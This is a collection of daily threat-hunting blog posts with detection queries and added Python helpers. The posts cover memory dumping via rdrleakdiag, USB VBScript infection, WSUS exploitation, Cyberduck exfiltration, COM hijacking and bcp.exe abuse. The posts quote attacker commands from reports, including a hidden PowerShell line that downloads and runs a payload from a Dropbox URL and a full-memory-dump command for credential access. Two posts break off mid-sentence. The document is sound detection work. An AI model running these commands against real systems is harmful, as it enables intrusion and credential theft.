
304. Adversaries Abuse Microsoft Windows Resource Leak Diagnostic Tool for Dumping Memory

Hello everyone! It's not always LSASS: in some cases adversaries may create full memory dumps and use them to access credentials. In this case, the adversary leveraged the Microsoft Windows Resource Leak Diagnostic tool (rdrleakdiag.exe) to obtain a memory dump:

rdrleakdiag /p [REMOVED] /o CSIDL_PROFILE\downloads /fullmemdmp /wait 1

Let's build a query:

event_type: "processcreatewin" AND proc_file_path: "rdrleakdiag.exe" AND cmdline: "fullmemdmp"

See you tomorrow!
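As an added Python example (not part of the original post), the following parses an rdrleakdiag command line like the one above, keeps only invocations that request a full dump, and enriches the hit with the image name of the dumped process from a constructed process table; the process table and the severity mapping are assumptions.

```python
import re

# Constructed sample: a process-list snapshot (pid -> image) from the same host, used for enrichment
PROCESS_TABLE = {4242: "outlook.exe", 716: "lsass.exe"}

# A switch is "/name", optionally followed by a value that does not itself start with "/"
SWITCH_RE = re.compile(r'/(?P<name>[A-Za-z]+)(?:\s+(?P<value>"[^"]*"|[^/\s]\S*))?')


def parse_rdrleakdiag(cmdline):
    """Return the switches of an rdrleakdiag command line as {name: value-or-True} (names lower-cased)."""
    opts = {}
    for m in SWITCH_RE.finditer(cmdline):
        value = m.group("value")
        opts[m.group("name").lower()] = value.strip('"') if value else True
    return opts


def triage_memory_dump(cmdline, process_table=PROCESS_TABLE):
    """Mirror the hunt above: flag rdrleakdiag writing a full memory dump (/fullmemdmp).

    Returns None for other rdrleakdiag uses; otherwise a dict with the target pid, the
    output directory and, when the pid is known in the process table, the dumped image.
    """
    if "rdrleakdiag" not in cmdline.lower():
        return None
    opts = parse_rdrleakdiag(cmdline)
    if "fullmemdmp" not in opts:
        return None
    pid = opts.get("p") if isinstance(opts.get("p"), str) else None
    try:
        image = process_table.get(int(pid), "unknown")
    except (TypeError, ValueError):  # pid missing or redacted, e.g. "[REMOVED]" in the report
        image = "unknown"
    return {
        "target_pid": pid,
        "target_image": image,
        "output_dir": opts.get("o", ""),
        # Assumption: an LSASS dump is rated high; any other full dump still warrants review
        "severity": "high" if image == "lsass.exe" else "medium",
    }
```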

303. Hunting for Replication Through Removable Media

Hello everyone! It may not be very common, but some adversaries still use infected USB devices for malware distribution, so today we'll look at an example of Replication Through Removable Media (T1091). The example is Tangerine Turkey. The adversary leverages infected USB devices to distribute cryptocurrency-mining malware. So, the infection starts with executing a malicious VBScript from a USB drive:

C:\WINDOWS\System32\WScript.exe E:\rootdir\x817994.vbs

It means we can hunt for suspicious scripts executed from external drives, for example, D:\, E:\ and F:\. Let's build the query:

event_type: "processcreatewin" AND proc_file_path: "wscript.exe" AND cmdline: ("d\\\:" OR "e\\\:" OR "f\\\:")

See you tomorrow!
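An added Python example (not from the original post) that, instead of matching the literal strings d:, e: and f:, parses the wscript/cscript command line, finds the script argument and reports its drive letter whenever it is not one of the host's fixed drives; the set of fixed drives and the script extension list are assumptions.

```python
import re

SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf")
# Assumption: the host's fixed drives; anything else (D:, E:, F:, ...) is treated as external media
FIXED_DRIVES = {"C:"}
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")

# Quote-aware split of a Windows command line (simplified: no escaped quotes inside arguments)
ARG_RE = re.compile(r'"([^"]*)"|(\S+)')


def split_args(cmdline):
    return [quoted or bare for quoted, bare in ARG_RE.findall(cmdline)]


def script_drive(cmdline, fixed_drives=FIXED_DRIVES):
    """Return the drive letter (e.g. 'E:') when a script host runs a script from a non-fixed drive.

    Returns None when the process is not a script host, no script argument is found,
    or the script lives on a fixed drive.
    """
    args = split_args(cmdline)
    if not args or not args[0].lower().endswith(SCRIPT_HOSTS):
        return None
    for arg in args[1:]:
        if arg.startswith("/"):  # host switches such as //B or //Nologo
            continue
        if arg.lower().endswith(SCRIPT_EXTS):
            m = re.match(r"([A-Za-z]:)\\", arg)
            if m and m.group(1).upper() not in fixed_drives:
                return m.group(1).upper()
            return None  # script found, but on a fixed drive
    return None
```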

302. Hunting for CVE-2025-59287 Exploitation

Hello everyone! I think you have already heard about a vulnerability in Microsoft's Windows Server Update Services (WSUS). Today we'll talk about Exploit Public-Facing Application (T1190) and CVE-2025-59287. So, the vulnerability is already actively exploited ITW. According to this report, successful exploitation leads to spawning command and scripting interpreters from wsusservice.exe and w3wp.exe. Here we have the first part of our detection opportunities. The first one:

event_type: "processcreatewin" AND proc_file_path: ("cmd.exe" OR "powershell.exe") AND proc_p_file_path: "wsusservice.exe"

The second:

event_type: "processcreatewin" AND proc_file_path: ("cmd.exe" OR "powershell.exe") AND proc_p_file_path: "w3wp.exe" AND proc_p_cmdline: "wsuspool"

Also, the adversary leveraged a PowerShell payload to exfiltrate data to a webhook.site endpoint. And this is another detection opportun...
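The two parent-child hunts above, as an added Python example (not from the report or the original post) that evaluates process-creation events carrying the same field names; the sample events, including the WsusService.exe install path and the w3wp.exe app-pool arguments, are constructed.

```python
import ntpath

INTERPRETERS = {"cmd.exe", "powershell.exe"}


def _image(path):
    """Lower-cased file name of a full path (or a bare name)."""
    return ntpath.basename(path or "").lower()


def wsus_exploit_rule(event):
    """Evaluate one processcreatewin event; return the matching rule name or None."""
    if event.get("event_type") != "processcreatewin":
        return None
    if _image(event.get("proc_file_path")) not in INTERPRETERS:
        return None
    parent = _image(event.get("proc_p_file_path"))
    if parent == "wsusservice.exe":
        return "wsusservice_spawns_interpreter"
    # The IIS worker alone is too noisy; require the WSUS application pool in the parent command line
    if parent == "w3wp.exe" and "wsuspool" in (event.get("proc_p_cmdline") or "").lower():
        return "wsuspool_spawns_interpreter"
    return None


# Constructed sample events (not taken from the report)
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Windows\System32\cmd.exe",
     "proc_p_file_path": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "proc_p_cmdline": ""},
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "proc_p_file_path": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "proc_p_cmdline": r'c:\windows\system32\inetsrv\w3wp.exe -ap "WsusPool" -v "v4.0"'},
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Windows\System32\cmd.exe",
     "proc_p_file_path": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "proc_p_cmdline": r'c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool"'},
]


def hunt(events=SAMPLE_EVENTS):
    """Return (index, rule) for every event that matches one of the two hunts."""
    hits = [(i, wsus_exploit_rule(e)) for i, e in enumerate(events)]
    return [(i, r) for i, r in hits if r]
```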

301. Qilin Abuses Cyberduck for Exfiltration

Hello everyone! Let's talk about data exfiltration trends and ransomware. Modern ransomware attacks almost always involve this stage, so it's important to document the tools adversaries use to solve this task. According to this report, Qilin ransomware affiliates often abuse Cyberduck for data exfiltration. It's a legitimate open source file transfer client that enables an adversary to connect to remote servers and cloud storage services to upload, download, and manage files. As always, we can build hunts based on the executable's metadata, for example:

event_type: "processcreatewin" AND proc_file_productname: "cyberduck"

Also, we can look for resolution of Cyberduck-related domains, for example:

event_type: "dnsreqwin" AND dns_rname: "cyberduck.io"

See you tomorrow!

300. Same Name, Wrong Path

Hello everyone! We have talked about how adversaries masquerade malicious files a few times already, but let's look at another curious case of COM Hijacking (T1546.015). By adding a malicious entry under HKCU that points a CLSID to their DLL, attackers cause normal system processes to load that malicious DLL. In this case, the adversary overrode the CLSID for twinapi.dll ({AA509086-5Ca9-4C25-8F95-589D3C07B48A}), forcing system processes and web browsers to load the attacker's DLL. We can hunt for loading of twinapi.dll from uncommon locations:

event_type: "imageloadwin" AND file_name: "twinapi.dll" AND NOT file_path: ("windows\\system32" OR "windows\\syswow64")

See you tomorrow!
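An added Python example (not from the original post) for the image-load hunt: it normalizes the load path (slashes, '..' segments, case) and compares the directory exactly against System32/SysWOW64, next to a naive substring exclusion like the query's, so you can see on which paths the two disagree; the system drive is assumed to be C:.

```python
import ntpath

# Assumption: Windows is installed on C:
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
TARGET_DLL = "twinapi.dll"


def normalize(path):
    """Canonical form of a Windows path: back-slashes only, '.'/'..' segments resolved, lower case."""
    return ntpath.normpath(path).lower()


def twinapi_load_outside_system(file_path):
    """True when twinapi.dll is loaded from any directory other than System32 or SysWOW64."""
    p = normalize(file_path)
    if ntpath.basename(p) != TARGET_DLL:
        return False
    return ntpath.dirname(p) not in SYSTEM_DIRS


def substring_rule(file_path):
    """Naive equivalent of the query's exclusion: flag unless the path *contains* a system-dir string."""
    p = file_path.lower()
    if not p.endswith(TARGET_DLL):
        return False
    return not ("windows\\system32" in p or "windows\\syswow64" in p)


def disagreements(paths):
    """Return the paths on which the normalized rule and the substring rule give different verdicts."""
    return [p for p in paths if twinapi_load_outside_system(p) != substring_rule(p)]
```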

299. That's How Adversaries Abuse the BCP Utility

Hello everyone! Today we'll look at a curious example of Deobfuscate/Decode Files or Information (T1140), and learn how ransomware affiliates abuse the Bulk Copy Program (BCP). The example is the Trigona ransomware gang, which also uses Mimic ransomware in its campaigns. So, the adversary often targets MS-SQL Server instances and leverages bcp.exe to export the toolset to the compromised server, for example:

bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\spd.exe" -T -f "C:\ProgramData\FODsOZKgAU.txt"
bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\AD.exe" -T -f "C:\ProgramData\FODsOZKgAU.txt"
bcp "select binaryTable from uGnzBdZbsi" queryout "C:\users\[username]\music\L.bat" -T -f "C:\users\[username]\music\FODsOZKgAU.txt"
bcp "select binaryTable from uGnzBdZbsi" queryout "C:\users\[username]\music\pci2.exe" -T -f "C:\users\[users name]\music\FODsOZKgAU.txt"

For example, we can hunt for bcp.exe exporting files to suspicious folders:

event_ty...
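An added Python example (not from the original post) that extracts the output file from a bcp ... queryout command line, accepting both straight and curly quotes as they often appear when commands are copied out of reports, and flags exports that write executables or scripts or that land in user-writable staging folders; the extension and folder lists are assumptions.

```python
import re
import ntpath

# Assumptions: what counts as a suspicious export (by file type or by a staging-directory segment)
SUSPICIOUS_EXTS = {".exe", ".dll", ".bat", ".cmd", ".ps1", ".vbs"}
SUSPICIOUS_DIRS = {"programdata", "public", "music", "downloads", "temp"}

# Straight "..." or curly “...” quoted arguments, otherwise whitespace-separated tokens
ARG_RE = re.compile(r'"([^"]*)"|“([^”]*)”|(\S+)')


def split_args(cmdline):
    return [a or b or c for a, b, c in ARG_RE.findall(cmdline)]


def bcp_export_target(cmdline):
    """Return the output file of 'bcp <query> queryout <file> ...', or None if this is not a bcp export."""
    args = split_args(cmdline)
    if not args or ntpath.basename(args[0]).lower() not in ("bcp", "bcp.exe"):
        return None
    for i, arg in enumerate(args[:-1]):
        if arg.lower() == "queryout":
            return args[i + 1]
    return None


def bcp_export_suspicious(cmdline):
    """True when bcp writes an executable/script, or writes into a staging folder such as ProgramData or Music."""
    target = bcp_export_target(cmdline)
    if target is None:
        return False
    t = target.lower()
    segments = t.replace("/", "\\").split("\\")  # directory segments only, the file name is excluded below
    return ntpath.splitext(t)[1] in SUSPICIOUS_EXTS or bool(SUSPICIOUS_DIRS & set(segments[:-1]))
```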

298. Hunting for Abusing Dropbox for Malware Delivery

Hello everyone! Let's look at another example of how financially motivated adversaries leverage legitimate web services to deliver malware. A financially motivated threat cluster (tracked as UNC6229) based in Vietnam is using fake job postings to target workers in digital advertising and marketing. The attackers post convincing job listings on legitimate job platforms and sometimes on domains they set up themselves. The adversary leveraged malicious LNK files, which abused PowerShell to download a payload from Dropbox:

PowerShell -WindowStyle Hidden -Command "Iex (irm 'hxxps://xkc1ffaq1b.dl.dropboxusercontent[.]com/scl/fi/e/0?rlkey=5lf9n8l2v6xmqpmnmqltf3s38')"

For example, we can hunt for PowerShell having Dropbox-related domains among its command line arguments:

event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: *dropboxusercontent*

See you tomorrow!
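An added Python example (not from either report or the original posts) covering the two domain-based hunts, 301 (Cyberduck DNS requests) and 298 (PowerShell fetching from Dropbox): it refangs indicators copied from reports (hxxps, [.]), matches hosts by domain suffix rather than by substring, and applies the same check to dnsreqwin events and to URLs found in a PowerShell command line; the sample events and the Dropbox URL in them are constructed.

```python
import re
from urllib.parse import urlsplit

# Domains from the two hunts; a host matches as the exact domain or any subdomain of it
WATCHED_DOMAINS = ("cyberduck.io", "dropboxusercontent.com")
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.I)


def refang(text):
    """Undo report-style defanging so indicators can be used in rules: hxxps:// -> https://, [.] -> ."""
    return re.sub(r"\bhxxp", "http", text, flags=re.I).replace("[.]", ".").replace("[:]", ":")


def host_matches(host, domain):
    """True when host equals domain or is a subdomain of it (so 'notcyberduck.io' does not match)."""
    host, domain = host.lower().rstrip("."), domain.lower().rstrip(".")
    return host == domain or host.endswith("." + domain)


def watched_domain(host):
    return next((d for d in WATCHED_DOMAINS if host_matches(host, d)), None)


def dns_hit(event):
    """Mirror the dnsreqwin hunt on a DNS request event."""
    if event.get("event_type") != "dnsreqwin":
        return None
    return watched_domain(event.get("dns_rname", ""))


def powershell_download_hit(event):
    """Mirror the processcreatewin hunt: PowerShell whose command line carries a URL on a watched domain."""
    if event.get("event_type") != "processcreatewin":
        return None
    if not event.get("proc_file_path", "").lower().endswith("powershell.exe"):
        return None
    for url in URL_RE.findall(refang(event.get("cmdline", ""))):
        hit = watched_domain(urlsplit(url).hostname or "")
        if hit:
            return hit
    return None


# Constructed sample events (the Dropbox URL is a placeholder, not a real indicator)
SAMPLE_EVENTS = [
    {"event_type": "dnsreqwin", "dns_rname": "update.cyberduck.io"},
    {"event_type": "dnsreqwin", "dns_rname": "notcyberduck.io"},
    {"event_type": "processcreatewin", "proc_file_path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "PowerShell -WindowStyle Hidden -Command \"Iex (irm 'hxxps://abc123.dl.dropboxusercontent[.]com/scl/fi/PLACEHOLDER')\""},
]


def hunt(events=SAMPLE_EVENTS):
    """One verdict per event: the watched domain that matched, or None."""
    return [dns_hit(e) or powershell_download_hit(e) for e in events]
```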